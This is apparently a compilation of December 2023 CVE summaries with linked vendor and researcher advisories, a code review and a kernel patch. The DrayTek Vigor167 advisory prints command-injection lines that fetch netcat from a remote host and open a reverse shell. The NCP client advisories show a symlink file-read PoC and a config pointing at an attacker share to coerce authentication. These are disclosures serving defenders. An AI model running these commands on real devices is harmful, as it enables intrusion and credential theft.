An issue was discovered in Zammad before 6.2.0. In several subsystems, SSL/TLS was used to establish connections to external services without proper validation of hostname and certificate authority. This is exploitable by man-in-the-middle attackers.

Security Advisory

December 6, 2023 · Please read carefully and check if the version of your Zammad system is affected by this vulnerability. Please send us information regarding vulnerabilities in Zammad!

**Security Advisory Details**

*   ID: ZAA-2023-04
*   Date: 2023-12-06
*   Title: Improper Certificate Validation
*   Severity: high
*   Product: Zammad 6.1.x
*   Fixed in: Zammad 6.2.0
*   References:  
    \--> pending CVE assignment

**Vulnerability Descriptions****Improper Certificate Validation**

In several subsystems of Zammad, SSL/TLS was used to establish connections to external services without proper validation of hostname and certificate authority. This is a security risk in case an attacker manages to redirect network traffic to another server.

**Recommended Resolution**

This vulnerability is fixed in the latest versions of Zammad and it is recommended to upgrade to one of these.

🚨 Please note that for existing configured external connections such as email, SSL verification _will not be turned on automatically_. Admins need to review all configured connections and turn on SSL verification where applicable (e.g. in case of publicly available services).

Fixed releases can be found at:

*   https://zammad.org/
*   https://ftp.zammad.com/

Or just update your Zammad if installed via OS package manager.

**Additional information**

Online version of this advisory: https://zammad.com/en/advisories/zaa-2023-04

Please send remarks on security issues exclusively to security@zammad.com.

CVE-2023-50454: Security Advisory ZAA-2023-04 | Zammad

An issue was discovered in Mullvad VPN Windows app before 2023.6-beta1. Insufficient permissions on a directory allow any local unprivileged user to escalate privileges to SYSTEM.

> _Reviewable_ status: 9 of 14 files reviewed, 3 unresolved discussions (waiting on @Jontified)

_mullvad-paths/src/windows.rs line 146 at r3 (raw file):_

>     // Authenticated users SID https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers
>     let (authenticated\_users\_ea, authenticated\_users\_psid) =
>         match create\_explicit\_access("S-1-5-11", GENERIC\_READ) {

This is fine, but it seems like we could have used CreateWellKnownSid(WinAuthenticatedUserSid, ...) and CreateWellKnownSid(WinBuiltinAdministratorsSid, ...) here.

A nice thing about it is that we allocate the memory ourselves, so most of the LocalFrees go away, and we only have to use plain arrays or Vecs. Cleaner, probably?

Though I vaguely recall that this did not work for some reason.

_mullvad-paths/src/windows.rs line 217 at r3 (raw file):_

>     let sid\_wide\_str = get\_wide\_str(sid\_wide\_str);
>     let mut psid = ptr::null\_mut();
>     if 0 == unsafe { ConvertStringSidToSidW(sid\_wide\_str.as\_ptr(), &mut psid) } {

I think we should avoid Yoda conditions, as they're inconsistent with our general code style. The point of these is mainly to prevent accidental assignment, which isn't relevant for if statements in Rust.

CVE-2023-50446: Set permissions on log directory by Jontified · Pull Request #5398 · mullvad/mullvadvpn-app

A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability.

CVE-2023-6655

A vulnerability was found in code-projects Matrimonial Site 1.0. It has been classified as critical. Affected is an unknown function of the file /auth/auth.php?user=1. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247344.

CVE-2023-6651

sec_attest_info in drivers/accel/habanalabs/common/habanalabs_ioctl.c in the Linux kernel through 6.6.5 allows an information leak to user space because info->pad0 is not initialized.

**Xingyuan Mo** hdthky0 at gmail.com  
_Wed Nov 22 10:49:40 UTC 2023_

*   Previous message (by thread): \[PATCH\] drm/i915/psr: Fix unsigned expression compared with zero
*   Next message (by thread): \[PATCH\] drm/amdgpu: Fix cat debugfs amdgpu\_regs\_didt causes kernel null pointer
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

This function may copy the pad0 field of struct hl\_info\_sec\_attest to
user mode which has not been initialized, resulting in leakage of kernel
heap data to user mode. To prevent this, just zero out the pad0 field
before copying it to user mode.

Fixes: 0c88760f8f5e ("habanalabs/gaudi2: add secured attestation info uapi")
Signed-off-by: Xingyuan Mo <hdthky0 at gmail.com\>
---
 drivers/accel/habanalabs/common/habanalabs\_ioctl.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/accel/habanalabs/common/habanalabs\_ioctl.c b/drivers/accel/habanalabs/common/habanalabs\_ioctl.c
index 8ef36effb95b..9e3feb7ad5e5 100644
--- a/drivers/accel/habanalabs/common/habanalabs\_ioctl.c
+++ b/drivers/accel/habanalabs/common/habanalabs\_ioctl.c
@@ -707,6 +707,7 @@ static int sec\_attest\_info(struct hl\_fpriv \*hpriv, struct hl\_info\_args \*args)
 	memcpy(&info->public\_data, &sec\_attest\_info->public\_data, sizeof(info->public\_data));
 	memcpy(&info->certificate, &sec\_attest\_info->certificate, sizeof(info->certificate));
 	memcpy(&info->quote\_sig, &sec\_attest\_info->quote\_sig, sizeof(info->quote\_sig));
+	memset(&info->pad0, 0, sizeof(info->pad0));
 
 	rc = copy\_to\_user(out, info,
 				min\_t(size\_t, max\_size, sizeof(\*info))) ? -EFAULT : 0;
-- 
2.43.0

*   Previous message (by thread): \[PATCH\] drm/i915/psr: Fix unsigned expression compared with zero
*   Next message (by thread): \[PATCH\] drm/amdgpu: Fix cat debugfs amdgpu\_regs\_didt causes kernel null pointer
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

More information about the dri-devel mailing list

CVE-2023-50431: [PATCH] habanalabs: fix information leak in sec_attest_info()

The Goodix Fingerprint Device, as shipped in Dell Inspiron 15 computers, does not follow the Secure Device Connection Protocol (SDCP) when enrolling via Linux, and accepts an unauthenticated configuration packet to select the Windows template database, which allows bypass of Windows Hello authentication by enrolling an attacker's fingerprint.

CVE-2023-50430: A Touch of Pwn - Part I

In Bitcoin Core through 26.0 and Bitcoin Knots before 25.1.knots20231115, datacarrier size limits can be bypassed by obfuscating data as code (e.g., with OP_FALSE OP_IF), as exploited in the wild by Inscriptions in 2022 and 2023.

CVE-2023-50428: Common Vulnerabilities and Exposures - Bitcoin Wiki

An OS Command Injection in the CLI interface on DrayTek Vigor167 version 5.2.2, allows remote attackers to execute arbitrary system commands and escalate privileges via any account created within the web interface.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-023 Product: Vigor167 Manufacturer: DrayTek Affected Version(s): 5.2.2 Tested Version(s): 5.2.2 Vulnerability Type: OS Command Injection (CWE-78) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2023-09-22 Solution Date: 2023-11-16 Public Disclosure: 2023-12-06 CVE Reference: CVE-2023-47254 Author of Advisory: Fabian Krone, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Vigor167 is a VDSL2 35b Supervectoring Modem. The manufacturer describes the product as follows (see \[1\]): "Vigor167 is a VDSL2 35b modem/router." Due to missing input validation, the command-line interface of the device is vulnerable to an OS command injection. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Vigor167 has a command-line interface available via both Telnet and SSH. This interface requires a login with any account available in the web interface. This also includes accounts which were denied every access according to their group settings. Afterward, a limited set of commands is available to the user. The ping command present allows injecting commands which are then executed on the device. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Commands can be injected with backticks (\`\`). The current working directory can be printed out with the following command: vigor> exec ping \`pwd\` ping: /tmp: Unknown host Another possibility is to wrap the OS command in parentheses following a dollar sign like $(pwd). The available commands are very limited. For example, only a small fraction of the standard output from the injected commands is displayed. Furthermore, space characters lead to evaluation errors. In order to achieve a full reverse shell, some of BusyBox's internal commands can be used. A TFTP server is hosted as preparation on a computer which is reachable by Vigor167 over the network. A statically compiled version of Netcat\[2\] is hosted on the TFTP server. First, the operating system of Vigor167 is instructed to download the file: vigor> exec ping \`busybox${IFS}tftp${IFS}-l${IFS}/tmp/netcat${IFS}-g${IFS}-r${IFS}netcat${IFS}192.168.100.5\` BusyBox v1.00 (2023.05.29-03:34+0000) multi-call binary usage: ping \[OPTION\]... host ${IFS} is a POSIX variable that contains the field separator and serves as replacement for the space character. Then, the executable flag is set on the transferred Netcat binary: vigor> exec ping \`chmod${IFS}+x${IFS}/tmp/netcat\` BusyBox v1.00 (2023.05.29-03:34+0000) multi-call binary usage: ping \[OPTION\]... host On the computer hosting the TFTP server, a Netcat listener is opened. Then, a reverse shell can be spawned: vigor> exec ping \`/tmp/netcat${IFS}192.168.100.5${IFS}9001${IFS}-e${IFS}ash\` The reverse shell is opened to the targeted host: Connection from 192.168.100.1:43354 sh: turning off NDELAY mode pwd /tmp Vigor167 was used in modem mode. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update the modem's firmware to version 5.2.3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-07-30: Vulnerability discovered 2023-09-22: Vulnerability reported to manufacturer 2023-11-16: Patch released by manufacturer 2023-12-06: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Vigor167 https://www.draytek.com/products/vigor167 \[2\] Statically compiled MIPS32 Netcat https://github.com/darkerego/mips-binaries/blob/master/netcat \[3\] SySS Security Advisory SYSS-2023-023 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-023.txt \[4\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Fabian Krone of SySS GmbH. E-Mail: fabian.krone@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Fabian\_Krone.asc Key ID: 0xBFDF30ABD10EA0F4 Key Fingerprint: 0ADE D2AA AE27 7DDA A8F0 C051 BFDF 30AB D10E A0F4 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEECt7Sqq4nfdqo8MBRv98wq9EOoPQFAmVouRMACgkQv98wq9EO oPRkjhAAnkZCXYM9lqXIbN+pGZoA2Zv93z8JXv34vIhCahv1G47ocJ0L7kLb7KNz +EbLTEnoh9Kxukw7tjNV6zvHRhav2o5KQBaelgGyCAmgtcKp30eCkN0sO4ocBqm5 wBYbYxVzOk6+aMOxIR6B496lT5AvFtzHXeCuwm4Vewpv/v7L78ixA1vnD+cjJuHq BdA/IYxrQKUEeZBlBqNM1WFe2AUxhaxGnskBrQtnZcblrJwLj3CY4UCbAehFCN29 p0iw6ntnMfpSP85nwM7mNIQo1UFWvA3Dnx6sVK7LjokX+bBAgrjjklxUdZoN1exa htT12p6lE9UNWteFt0xkgdMRkTM48CUsDpiQORIRTbb20Haz9byNTieH3UxX/OLE mU/D/BhfX4F55f0Yxlz/kJ+5hLEv4EUUIfuM4uM6vntH1E8Y/FGMxdpWVqtvCU64 U6mr52/ZLWKxyyp1+qZn2UpkP9zntO8sNUd2Yt3TqpNfOydJGNff//A5gqPkJy6B s1bZEYNWN6zpkkVukFT+EIjQHyA8OaTud8TUmo0uuvN240S74yqKpb7czaAjdOwn c5h6IlqEYu70lpnEc2d9UFRN4nGJ/NiLuimDbFjaqtjzGa+rDFNNSHDvS8jN+tN5 bgZ6SPy+mXNh07dqET/SVaI8P/yIZmNIENtNrW7z6fbr6F+aKfk= =7izf -----END PGP SIGNATURE-----

CVE-2023-47254

Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers read the contents of arbitrary files on the operating system by creating a symbolic link.

**usd-2022-0003 | NCP Secure Enterprise Client - Arbitrary File Read**

**Advisory ID:** usd-2022-0003  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Arbitrary File Read  
**Security Risk:** High  
**Vendor URL:** https//www.ncp-e.com/  
**Vendor Status:** Fixed

**Introduction**

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client supports a _Support Assistant_ feature, which allows low privileged user accounts to obtain diagnostic  
information from the operating system. After the corresponding information was collected, users can inspect the contents of the collected  
files within the graphical user interface of the _NCP_ application. Despite the graphical user interface runs with the permissions of the  
current user, inspecting a diagnostic file causes a high privileged service to read the contents of it. After reading, the contents are send to  
the graphical user interface of the _NCP_ application and displayed to the invoking user.

After the _Support Assistant_ has collected the diagnostic files, they are stored within the directory __C:\\Users\\\\AppData\\Local\\Temp\\NcpSupport\*_.  
This is also the directory where the high privileged service obtains the file contents from when files are inspected within the graphical  
user interface. Since the directory is fully user controlled, low privileged users can use a_ symbolic link\* to redirect the read operation to  
an arbitrary target.

**Proof of Concept**

The first step is to start the _Support Assistant_ within the tray icon of the _NCP Secure Enterprise_ client. The corresponding function  
can be found in the upper right of the graphical user interface under the _Help_ menu. After the _Support Assistant_ has collected the  
diagnostic information, the corresponding files are displayed within the graphical user interface:

Now it is possible to replace one of the files with a _symbolic link_ to an arbitrary target. In the following listing we replace the  
file **C:\\Users\\\\AppData\\Local\\Temp\\NCPSupport\\services.txt** with a _symbolic link_ pointing to **C:\\Windows\\CCM\\CcmEval.xml**.  
Moreover, we demonstrate that the target file is not readable for a low privileged user account:

PS C:\\> type C:\\Windows\\CCM\\CcmEval.xml  
type : Der Zugriff auf den Pfad "C:\\Windows\\CCM\\CcmEval.xml" wurde verweigert.  
In Zeile:1 Zeichen:1  
+ type C:\\Windows\\CCM\\CcmEval.xml  
+ \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    + CategoryInfo          : PermissionDenied: (C:\\Windows\\CCM\\CcmEval.xml:String) \[Get-Content\], UnauthorizedAccessException    + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommandPS C:\\> $code \= (iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs).content  
PS C:\\> Add-Type $code  
PS C:\\> $s \= New-Object de.usd.SharpLink.Symlink("C:\\Users\\<USER>\\AppData\\Local\\Temp\\NCPSupport\\services.txt", "C:\\Windows\\CCM\\CcmEval.xml")  
PS C:\\> $s.Open()  
\[+\] Creating Junction: C:\\Users\\<USER\>\\AppData\\Local\\Temp\\NCPSupport \-> \\RPC CONTROL  
\[+\] Creating DosDevice: Global\\GLOBALROOT\\RPC CONTROL\\services.txt \-> \\??\\C:\\Windows\\CCM\\CcmEval.xml  
\[+\] Symlink setup successfully.

Now it is time to inspect the file **services.txt** within the _Support Assistant_ graphical user interface.  
Clicking the corresponding file twice shows the contents of the targeted file:

**Fix**

It is not evident why a high privileged service is used to display the obtained diagnostic information. The read operation  
should be performed by the low privileged process instead, which also draws the graphical user interface.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   **2022-02-02** First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is released
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

CVE-2023-28869: Security Advisory usd-2022-0003 | usd HeroLab

Insecure File Permissions in Support Assistant in NCP Secure Enterprise Client before 12.22 allow attackers to write to configuration files from low-privileged user accounts.

**usd-2022-0004 | NCP Secure Enterprise Client - Insecure File Permissions**

**Advisory ID:** usd-2022-0004  
**Product:** NCP Secure Enterprise Client  
**Affected Version:** 12.22  
**Vulnerability Type:** Insecure File Permissions  
**Security Risk:** Medium  
**Vendor URL:** https//www.ncp-e.com/  
**Vendor Status:** Fixed

**Description**

The _NCP Secure Enterprise_ client is a _VPN_ and networking application that is utilized by many organisations to connect workstations  
to the cooperate network. The client stores it's configuration files within the directory **C:\\\\ProgramData\\\\NCP\\\\SecureClient**, which grants  
low privileged user accounts write access to most resources. Attackers can abuse this configuration in different ways as demonstrated  
in the _Proof of Concept_ section below:

**Proof of Concept**

This section contains proof of concepts for some of the writable resources:

**cacerts**

Since the folder **C:\\\\ProgramData\\\\NCP\\\\SecureClient\\\\cacerts** is writable for low privileged user accounts, it is possible to add new _CA_  
certificates that may allow connections to untrusted endpoints:

**cbo.ini**

The file **C:\\\\ProgramData\\\\NCP\\\\SecureClient\\\\config\\\\cbo.ini** is also writable for low privileged user accounts. This file  
can be used to configure custom branding of the _NCP Secure Enterprise_ client by specifying the path to the desired theme  
files. By specifying the address of a network share instead, it is possible to coerce a remote authentication by each user  
that logs in on the prepared workstation. Furthermore, since the _NCP Secure Enterprise_ client starts on startup, an remote  
authentication of the machine account can be coerced.

\[GENERAL\]  
Enabled\=1\[DEUTSCH\]  
Picture\=\\\\\\\\attacker\\\\share\\\\test.png  
HtmlLocal\=%BaseDataDir%\\\\CustomBrandingOption\\\\de\\\\bla.html\[ENGLISH\]  
Picture\=\\\\\\\\attacker\\\\share\\\\test.png  
HtmlLocal\=%BaseDataDir%\\\\CustomBrandingOption\\\\en\\\\bla.html

**ncpmon.ini**

The file **C:\\\\ProgramData\\\\NCP\\\\SecureClient\\\\config\\\\ncpmon.ini** contains several different configuration settings.  
One of them is the **LogPath** setting within the _Gina_ section. Since the file is writable by low privileged user  
accounts, it is possible to set the **LogPath** to an arbitrary directory.

\[GENERAL\]  
...SNIP...\[GINA\]  
DisableGinaClient\=0  
LogLevel\=9  
LogPath\=C:\\\\

The configuration is then used by a high privileged service to write into the corresponding location:

C:\\\\>dir  
 Datenträger in Laufwerk C: ist Windows   Verzeichnis von C:\\\\   05.05.2021  10:09    <DIR>          Program Files  
   05.05.2021  10:09    <DIR>          Program Files (x86)  
   05.05.2021  10:09    <DIR>          Users  
   05.05.2021  10:09    <DIR>          Windows  
   30.11.2021  10:51         1.960.248 NcpGinaLog.txt

Apart form the above mentioned issues, other attacks may be possible. The file **extdial.conf** contains e.g.  
the filenames of _dynamic linked library_ (_DLL_) files which could may lead to privilege escalation vulnerabilities  
on certain setups.

**Fix**

The contents of the configuration folder should be reviewed and more restrictive permissions should be applied  
to files that store sensitive configuration items. Low privileged user accounts should only be allowed to modify  
configuration options that do not affect the security of the operating system.

**References**

*   https://www.ncp-e.com/
*   https://github.com/usdAG/SharpLink

**Timeline**

*   2022-02-02 First contact request via info-mv@ncp-e.com
*   2022-02-02 Advisory transfered to the vendor
*   2022-02-15 Vendor appreciates the submission of the advisories and begins to fix the identified vulnerabilities
*   2022-06-09 Responsible Disclosure Team requests an update
*   2022-06-21 Vendor annouces a new software release available in August
*   2022-08-31 NCP Secure Enterprise Client 13.10 is released
*   2023-03-03 This advisory is published

**Credits**

These security vulnerabilities were found by Tobias Neitzel.

Tag

#auth